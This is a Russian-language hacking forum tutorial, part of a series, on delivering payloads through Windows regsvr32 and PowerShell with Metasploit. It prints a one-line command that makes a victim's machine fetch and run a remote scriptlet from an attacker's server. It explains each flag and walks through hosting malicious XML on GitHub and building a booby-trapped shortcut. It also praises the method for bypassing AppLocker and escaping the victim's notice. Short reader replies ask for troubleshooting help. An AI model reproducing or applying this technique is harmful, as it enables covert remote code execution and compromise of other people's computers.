|
Часть 6 Предыдущая частьСледующая часть Все части Доброго времени суток колеги. Сегодня продолжим c вами применять различные техники доставки полезной нагрузки c применением powershell и встроенной утилиты Windows RegSVR. Техника такой доставки полезной нагрузки очень похожа на технику Web Delivery . Ну сразу же хотелось бы сказать, что данная техника применяется в большинстве случаев для обхода AppLocker, но его наличия совсем не обязательно.В конце статьи я попытаюсь продемонстрировать как можно эту технику применять для инжекта в ярлыки. И так ,давайте приступим) Сперва давайте посмотрим как работает уже готовый експлойт в метаслоте https://forum.antichat.xyz/attachments/4771805/1.png Как видим из описания - этот експлойт поднимает на стороне атакуещего простенький веб сервер где создается вредоносный .sct файл в котором находится команда для подгрузки вредоносного скрипта на powershell,который так же размещен на этом веб сервере. Давайте зададим ему необходимые опции и запустим: https://forum.antichat.xyz/attachments/4771805/2.png Как видим эксплоит выдал нам команду ,которую нужно запустить на стороне жертвы. Код: Код:
regsvr32 /s /n /u /i:http://192.168.0.107:8080/.sct scrobj.dllhttps://forum.antichat.xyz/attachments/4771805/3.png https://forum.antichat.xyz/attachments/4771805/4.png Как видим все очень легко и просто. Давайте посмотрим как это все работает: Сперва посмотрим на соcданый файл .sct https://forum.antichat.xyz/attachments/4771805/5.png Как видим это обычный XML файл который обработается библиотекой scrobj.dll ( Script Component Runtime) при скачивании . Regsvr32 является частью ОС и может использоваться для регистрации или отмены регистрации файлов COM скриптов в реестре Windows Но если разобрать команду по подробнее: /s (silent) скрытая запуск, не использовать не каких сообщений на вывод. /n -- говорит о том что не нужно использовать DllRegisterServer /u -- отмена регистрации /i -- отвечает за ссылку и DLLinstall Наша XML представляет из себя VS или JS скрипт между тегами Сам шаблон для выполнения команды выглядит так: В этом простом примере запускается просто cmd.exe: А в нашем примере метасплоит создал XML , где вместо cmd.exe запускается команда на павершел от веб деливери. Цитата:
https://forum.antichat.xyz/attachments/4771805/8.png https://forum.antichat.xyz/attachments/4771805/7.png Думаю , что вполне легко ,по принципу прошлой моей статьи,написать генератор таких XML и закинуть такую XML где то на гитхаб или pastebin. Какая одна из главных преимуществ этой техники ??? Мне удалось заметить - что при выполнении данной команды,жертва не видит кратковременного мелькания окна командной строки( как при обычном запуске команды для павершел).Следственно если где то прописать эту строчку в автозагрузку или куда то заинжектить - то врят ли жертва что то сможет заметить.) Давайте я продемонстрирую как лекго можно создать вредоносный ярлык с использованием этой техники. Сперва создадим полезную нагрузку: https://forum.antichat.xyz/attachments/4771805/9.png Простенький генератор XML файлов https://forum.antichat.xyz/attachments/4771805/11.png https://forum.antichat.xyz/attachments/4771805/10.png Закинем где то на гитхаб и проверим работоспособность... https://forum.antichat.xyz/attachments/4771805/12.png https://forum.antichat.xyz/attachments/4771805/14.png https://forum.antichat.xyz/attachments/4771805/15.png Теперь давайте создадим вредоносный ярлык с помошью PowerShell: https://forum.antichat.xyz/attachments/4771805/16.png Проверяем, запускаем ярлык и получаем сессию https://forum.antichat.xyz/attachments/4771805/17.png Всем спасибо за внимание) Предыдущая часть Следующая часть Все части |
не подскажите в чем проблема, сессия открывается , если просто powershell запустить
А вот через гитхаб, не получается [doublepost=1488804246,1488786009][/doublepost] Цитата:
|
Цитата:
|
| Время: 12:12 |